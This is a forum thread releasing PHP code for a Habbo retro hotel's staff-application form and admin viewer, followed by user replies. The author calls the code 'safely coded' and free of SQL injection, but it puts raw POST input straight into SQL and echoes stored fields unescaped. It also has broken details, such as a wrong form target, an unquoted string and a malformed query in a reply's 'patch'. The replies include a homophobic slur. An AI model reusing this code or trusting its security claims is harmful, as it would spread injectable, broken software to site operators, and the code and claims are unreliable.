[PHPretro]Staff apps V3.1[safely coded]

Well , hello RZ . Staff apps v3 by me wasnt really safely coded , so here it is V3.1 !
I think you do not need screenies because it is all the same as v3 just re-coded ?

Kk, staff_apps.start.php :

PHP Code:

---

<?php 
/*-----------------------------------------------*\
| Staff Applications V3 coded by StronGCoder      |
| Staff Applications V3.1 re-coded by StronGCoder |
+-------------------------------------------------+
| Do not argue in the thread , this is a release  |
\*-----------------------------------------------*/

require_once('./includes/core.php'); 
require_once('./includes/session.php'); 
$data = new me_sql; 
$lang->addLocale("home.me"); 

$page['id'] = "appsv3"; 
$page['name'] = "Staff Applications V3"; 
$page['bodyid'] = ""; 
$page['cat'] = "community"; 
require_once('./templates/community_header.php'); 
?> 

<div id="container"> 
    <div id="content"> 
    <div id="column1" class="column"> 
                <div class="habblet-container "> 
                        <div class="cbb clearfix pixellightblue "> 

                            <h2 class="title">Staff Applications</span> 
                            </h2> 
<form action="staff_apps.sent.php" method="post"> 
<img src="http://www.habborator.org/badges/badges/ADM.gif" align="left"><img src="http://www.habborator.org/badges/badges/ADM.gif" align="right"></a> 
<br><center><b>Name</b><br>  
<input type="text" name="name"> 
<br><br> 
<b>Username</b><br> 
<input type="text" name="username"><br> 
<br> 
<b>Age</b><br> 
<input type="text-number" name="age"><br> 
<br> 
<b>Email</b><br> 
<input type="email" name="email"><br><br> 
<b>I am applying for ...</b><br> 
<input type="text" name="rank"><br> 
<br> 
<b>Country</b><br> 
<input type="text" name="country"><br><br> 
<b>Users you can bring on ?</b><br> 
<input type="text-numer" name="users_can_bring_on"><br><br> 
<b>Why do you want join the team ?</b> 
<textarea rows="5" cols="50" name="why_u_want_join"> 
</textarea><br><br> 
<b>Why can you improve ?</b> 
<textarea rows="5" cols="50" name="improve"> 
</textarea> 
<br><br> 
<input type="submit" value="Submit"> 
</form> 

</div></div></div> 

    <div id="column2" class="column"> 
                <div class="habblet-container "> 
                        <div class="cbb clearfix pixeldarkblue "> 

                            <h2 class="title">Did i spent ?</span> 
                            </h2> 
<center>We wish you best luck in your application . We will alert you in the hotel , site or email if you spent .<br>Thank you for using our form</center> 
</div></div></div> 
<?php require_once('./templates/community_footer.php');

---

staff_apps.done.php :

PHP Code:

---

<?php 
//heres the query
$sql="INSERT INTO staff_applications_v3 (name, username, age, email, applyfor, country, users_can_bring, why_u_want_join, improve) 
VALUES 
('$_POST[name]','$_POST[username]','$_POST[age]','$_POST[email]','$_POST[rank]','$_POST[country]','$_POST[users_can_bring_on]','$_POST[why_u_want_join]','$_POST[improve]')"; 
?> 

<?php 
/* 
/*-----------------------------------------------*\
| Staff Applications V3 coded by StronGCoder      |
| Staff Applications V3.1 re-coded by StronGCoder |
+-------------------------------------------------+
| Do not argue in the thread , this is a release  |
\*-----------------------------------------------*/



require_once('./includes/core.php'); 
require_once('./includes/session.php'); 
$data = new me_sql; 
$lang->addLocale("home.me"); 

$page['id'] = "appsv3"; 
$page['name'] = "Staff Applications V3"; 
$page['bodyid'] = ""; 
$page['cat'] = "community"; 
require_once('./templates/community_header.php'); 
mysql_query("$sql");
?> 

<div id="container"> 
    <div id="content"> 
    <div id="column1" class="column"> 
                <div class="habblet-container "> 
                        <div class="cbb clearfix pixellightblue "> 

                            <h2 class="title">Sent</span> 
                            </h2> 
<center>Your application at <?php ECHO SHORTNAME; ?> hotel has sent successfully . Please check back later , we will alert you in email , site or hotel if you got your rank .</center> 
</div></div></div> 
<?php require_once('./templates/community_footer.php'); ?>

---

insert to your database :

PHP Code:

---

CREATE TABLE staff_applications_v3 
( 
name varchar(1000), 
username varchar(1000), 
age int, 
email varchar(1000), 
applyfor varchar(1000), 
country varchar(1000), 
users_can_bring int, 
why_u_want_join varchar(10000), 
improve varchar(10000) 
) 


---

goes to housekeeping folder : appsv3.php :

PHP Code:

---

<?php 
/* 

/*-----------------------------------------------*\
| Staff Applications V3 coded by StronGCoder      |
| Staff Applications V3.1 re-coded by StronGCoder |
+-------------------------------------------------+
| Do not argue in the thread , this is a release  |
\*-----------------------------------------------*/



$page['dir'] = '\housekeeping'; 
$page['housekeeping'] = true; 
$page['rank'] = 6; //changed rank to moderator
require_once('../includes/core.php'); 
require_once('./includes/hksession.php'); 
$lang->addLocale("housekeeping.bans"); 
$data = new housekeeping_sql; 

$page['name'] = Staff Applications V3; 
$page['category'] = "users"; 
require_once('./templates/housekeeping_header.php'); 
?> 
<body> 
<?php 
$result = mysql_query("SELECT * FROM staff_applications_v3"); 

echo "<style type=text/css> 
table,th,td 
{ 
border:1px solid red; 
} 
</style> 
<style type=text/css> 
table, td, th 
{ 
border:1px solid black; 
} 
th 
{ 
background-color:white; 
color:black; 
} 
</style> 
<style type=text/css> 
h1 
{ 
background-color:white; 
} 
</style> 
<table border='1'> 
<tr> 
<th>Name</th> 
<th>Username</th> 
<th>Age</th> 
<th>Email</th> 
<th>Applying for ...</th> 
<th>Country</th> 
<th>Users can bring on :</th> 
<th>He wants to join team because :</th> 
<th>Can improve those things:</th> 


</tr>"; 
?> 

<?php 

while($row = mysql_fetch_array($result)) 
  { 

 echo "<tr>"; 
  echo "<style type=text/css> 
table,th,td 
{ 
border:1px solid red; 
} 
</style> 
<style type=text/css> 
table, td, th 
{ 
border:1px solid black; 
} 
th 
{ 
background-color:white; 
color:black; 
} 
</style> 
<style type=text/css> 
h1 
{ 
background-color:white; 
} 
</style><td> " . $row['name'] . "</td>"; 
  echo "<td>" . $row['username'] . "</td>"; 
  echo "<td>" . $row['age'] . " </td>"; 
  echo "<td>" . $row['email'] . " </td>"; 
  echo "<td>" . $row['applyfor'] . " </td>"; 
  echo "<td>" . $row['country'] . " </td>"; 
  echo "<td>" . $row['users_can_bring'] . " </td>"; 
  echo "<td>" . $row['why_u_want_join'] . " </td>"; 
  echo "<td>" . $row['improve'] . " </td>"; 

   
  echo "</tr>"; 
  } 
echo "</table>"; 
mysql_close($con); 
?> 
</body> 
</html> 


<?php require_once('./templates/housekeeping_footer.php'); ?>

---

My old account was StronGCoder - so this is coded by me , and also re-coded , so credits goes to me and Yifan Lu.

Please do not comment saying : this is all the same , yeah this is all the same but now your hotel will be projected using this and your SQL wont be public.

Thanks!

StronGCoder:rolleyes:

screen?

screen please...
but it looks nice ;)

Grr..
Arnii

Yeah, any screens?

And i thought the v3 version was the last release? :o

if u can read : I think you do not need screenies because it is all the same as v3 just re-coded ? , its all the same as V3 , the file is just got off sql injections (protected) !

$PEjump2
Yer , this is all the same , just re-coded (protected)

Quote:

---

Originally Posted by StrongFaith

if u can read : I think you do not need screenies because it is all the same as v3 just re-coded ? , its all the same as V3 , the file is just got off sql injections (protected) !

$PEjump2
Yer , this is all the same , just re-coded (protected)

---------- Post added at 05:27 AM ---------- Previous post was at 05:26 AM ----------

if u can read : I think you do not need screenies because it is all the same as v3 just re-coded ? , its all the same as V3 , the file is just got off sql injections (protected) !

$PEjump2
Yer , this is all the same , just re-coded (protected)

---

I want a screen!

okay lemme eat , then ill take it!

Attachment 82689
here it is , is not ALL same like this , it has staff badge image and not these colours , dats becuz i changed it a bit for my hotel!

Call this secure? Don't you just wanna add strip_tags($_POST['name']);
To block <b>, <marquee>, <script> tags :D

provide a screenie please?

there is one..
http://forum.ragezone.com/attachment...d-untitled.png

---------- Post added at 12:44 PM ---------- Previous post was at 12:43 PM ----------

there is one..
http://forum.ragezone.com/attachment...d-untitled.png

Thanks, taking a look now

Strong, YOUR SO PATHETIC EVERY THEME I USE U COPY IT LIKE GIVE IT UP. U WILL NEVER BE LIKE ME. YEAH I SAID IT U ALWAYS COPY MY THEME I USED THE BLUE U COPY THE HC U COPY AND THE PAGE IS BEAT UP. Soz for flame Rz, And Fyi this still is Exploitable u cant code safely can u... 2/10

Quote:

---

Originally Posted by GrandCoder

Strong, YOUR SO PATHETIC EVERY THEME I USE U COPY IT LIKE GIVE IT UP. U WILL NEVER BE LIKE ME. YEAH I SAID IT U ALWAYS COPY MY THEME I USED THE BLUE U COPY THE HC U COPY AND THE PAGE IS BEAT UP. Soz for flame Rz, And Fyi this still is Exploitable u cant code safely can u... 2/10

---

So True.

ur opinions ! ur changing ur words grand everytime we fight on msn..

---------- Post added at 04:45 AM ---------- Previous post was at 04:44 AM ----------

i didnt copy u , i liked it , and i done it ! whats problem with u m8 ?

EXPLOITS EXPLOITS EXPLOITS!!!

I would 100% defiantly not use this script - I can see an SQL injection in the first friggen line.

DO NOT USE IT.

Quote:

---

Originally Posted by Andrew

EXPLOITS EXPLOITS EXPLOITS!!!

I would 100% defiantly not use this script - I can see an SQL injection in the first friggen line.

DO NOT USE IT.

---

I'm surprised you would call him out like that.. You could have simple PM'd him and shown him the code.. instead of doing what you just did.

Thanks for the info tho

Him and Grandcoder are always fighting in like faggots.
Both of you need to hop of RaGEZONE.

This exploited my CMS when I was Hosting a Hotel on my Computer. Anyone can tell it has Exploits.

well since this is not secured lol I was gonna use it but nvm I don't want my hotel to be fucked

Quote:

---

Originally Posted by Shacobesaurus™

I'm surprised you would call him out like that.. You could have simple PM'd him and shown him the code.. instead of doing what you just did.

Thanks for the info tho

---

Yeah good idea, maybe I should tell him and not anyone else so he or others could use this script to exploit hotels, and therefore everyone would be then pissed off.

If you want, I can patch this and re-release.

Please do so Andrew, its what you should of done in the 1st place :S:

Replace your staffapps.done.php with this:

Haven't tested it, but it should work.

Code:

---

<?php  
/*-----------------------------------------------*\
| Staff Applications V3 coded by StronGCoder      |
| Staff Applications V3.1 re-coded by StronGCoder |
|-------------------------------------------------|
| Patched the exploits and re-leased by Andrew    |
| of www.ForceHotel.com and www.Elite-DEV.com    |
+-------------------------------------------------+
| Do not argue in the thread , this is a release  |
\*-----------------------------------------------*/

require_once('./includes/core.php'); 
require_once('./includes/session.php'); 
$data = new me_sql;  $lang->addLocale("home.me"); 

$page['id'] = "appsv3"; 
$page['name'] = "Staff Applications V3"; 
$page['bodyid'] = ""; 
$page['cat'] = "community"; 
require_once('./templates/community_header.php'); 

// COMPLETELY REWRITTEN.

// get the vars
if($_POST['name'])
{
$name = $input->FilterText($_POST['name']);
$username = $input->FilterText($_POST['username']);
$age = $input->FilterText($_POST['age']);
$email = $input->FilterText($_POST['email']);
$rank = $input->FilterText($_POST['rank']);
$country = $input->FilterText($_POST['country']);
$users2 = $input->FilterText($_POST['users_can_bring_on']);
$why = $input->FilterText($_POST['why_u_want_join']);
$improve = $input->FilterText($_POST['improve']);

// check for empties?

if (empty($name) || empty($username) || empty($age) || empty($email) || empty($rank) || empty($country) || empty($users2) || empty($why) || empty($improve))
{
$error = "Please fill in all the fields!";
}


if(empty($error))
{
$db->query("INSERT INTO staff_applications_v3 (name, username, age, email, applyfor, country, users_can_bring, why_u_want_join, improve) VALUES ('$name', '$username', '$age', '$email', '$rank', '$country', $users2', '$why', '$improve')");
}

}

?> 

<div id="container"> 
    <div id="content"> 
    <div id="column1" class="column"> 
                <div class="habblet-container "> 
                        <div class="cbb clearfix pixellightblue "> 

                            <h2 class="title">Sent</span> 
                            </h2> 
<center><?php if(empty($error)) { ?> Your application at <?php ECHO SHORTNAME; ?> hotel has sent successfully . Please check back later , we will alert you in email , site or hotel if you got your rank . <?php } else { echo $error; } ?></center> 
</div></div></div> 
<?php require_once('./templates/community_footer.php'); ?>

---

k, thank you Andrew

This looks similar to the other PHPretro staff apps thing..
Make the system more unique instead of just modifing it..